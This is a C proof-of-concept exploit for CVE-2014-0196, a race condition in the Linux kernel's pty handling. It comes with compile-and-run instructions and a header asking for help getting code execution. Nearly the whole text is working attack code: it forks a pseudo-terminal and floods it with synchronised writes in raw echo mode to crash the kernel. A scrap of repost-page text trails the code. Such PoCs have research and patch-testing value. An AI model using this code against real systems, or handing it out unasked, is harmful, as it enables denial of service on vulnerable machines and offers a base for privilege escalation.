|
/* CVE-2014-0196 DOS PoC [Written May 5th, 2014]
* by DigitalCold <digitalcold0@gmail.com>
*
* Note: this crashes my i686 Gentoo system running 3.12.14
* and an old Backtrack 5r3 running 3.2.6. Any advice on how to gain
* code exec would be greatly appreciated.
*
* Usage: gcc -O2 -o pty pty.c -lutil && ./pty
*
* CVE: http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-0196.html
* Bug discussion: http://bugzillafiles.novell.org/attachment.cgi?id=588355
* How-to-pty: http://rachid.koucha.free.fr/tech_corner/pty_pdip.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>
#include <sys/mman.h>
#include <pty.h>
#include <termios.h>
#include <fcntl.h>
// used to sync the two writer processes
volatile static int * Sync = NULL;
int main() {
int master, res;
struct termios tp;
Sync = mmap(NULL, sizeof *Sync, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_ANONYMOUS, -1, 0);
if(Sync == MAP_FAILED)
{
perror("Sync mmap");
exit(1);
}
// hold
*Sync = 0;
// create a child with a new PTY connection
pid_t child = forkpty(&master, NULL, NULL, NULL);
if(child == -1) {
perror("forkpty");
exit(1);
}
// parent
else if(child > 0) {
printf("CVE-2014-0196 DOS PoC by DigitalCold\n", getpid(), child);
printf("[+] New PTY - Master PID %d, Slave PID %d\n", getpid(), child);
printf("[+] Starting bombing run...\n");
int flags = fcntl(master, F_GETFL, 0);
fcntl(master, F_SETFL, flags | O_NONBLOCK);
// synchronizer process
int doSync = fork();
if(!doSync) { // child
// sync the two processes (CLK)
while(1) {
sleep(1);
*Sync = 1; // release
sleep(1);
*Sync = 0;
}
}
else if(doSync < 0)
{
perror("sync fork");
exit(1);
}
// used for printing status
int cnt = 0;
char readBuf[256<<3];
while(1) {
while(!*Sync) usleep(1000);
if(write(master, readBuf, sizeof readBuf) < 0) {
if(errno != EAGAIN) {
perror("master write");
exit(1);
}
}
// shovel the input
if(read(master, readBuf, sizeof readBuf) < 0) {
if(errno != EAGAIN) {
perror("master read");
exit(1);
}
}
if(cnt >= 200000) {
fprintf(stderr, "\n[-] No crash? Maybe you're not vulnerable...\n");
exit(1);
}
else if(cnt++ % 200 == 0)
fprintf(stderr, ".");
}
}
else { // child
char discard[1024];
if(tcgetattr(0, &tp) == -1)
perror("tcgetattr");
// enable raw mode with ECHO to trigger the bug
cfmakeraw(&tp);
tp.c_lflag |= ECHO;
if(tcsetattr(0, TCSAFLUSH, &tp) == -1)
perror("tcsetattr");
// make stdin and stdout non-blocking
int flags = fcntl(0, F_GETFL, 0);
fcntl(0, F_SETFL, flags | O_NONBLOCK);
flags = fcntl(1, F_GETFL, 0);
fcntl(1, F_SETFL, flags | O_NONBLOCK);
// construct a lengthy crash string
size_t badStrSz = 256<<2;
char * badStr = malloc(badStrSz);
int i;
for(i = 0; i < badStrSz; i++)
badStr[i] = 'A';
// slave loop
while(1) {
while(!*Sync) usleep(1000);
if(write(1, badStr, badStrSz) < 0)
if(errno != EAGAIN)
exit(1);
// eat the incoming data
if(read(0, discard, sizeof discard) < 0)
if(errno != EAGAIN)
exit(1);
}
}
return 0;
}
|
推荐
评论(0条)
